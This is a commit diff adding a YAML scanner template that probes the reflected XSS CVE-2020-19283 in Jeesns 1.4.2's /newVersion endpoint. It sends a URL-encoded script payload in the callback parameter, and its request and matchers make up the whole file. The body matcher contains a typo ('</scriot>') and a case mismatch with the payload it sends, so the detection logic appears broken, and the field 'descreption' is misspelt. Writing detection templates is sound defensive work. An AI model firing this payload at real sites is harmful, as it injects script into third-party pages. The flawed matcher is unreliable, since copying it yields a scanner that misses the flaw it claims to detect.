Create CVE-2020-19283.yaml

cves/2020/CVE-2020-19283.yaml

@@ -0,0 +1,35 @@
+id: CVE-2020-19283
+
+info:
+  name: Jeesns newVersion Reflection XSS
+  author: pikpikcu
+  severity: medium
+  descreption: reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML.
+  reference:
+    - https://github.com/zchuanzhao/jeesns/issues/10
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-19283
+  tags: cves,cve2020,jeesns,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}newVersion?callback=%3CScript%3Eprompt(document.domain)%3C/Script%3E"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<script>prompt(document.domain)</scriot>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'Content-Type: text/html'
+        part: header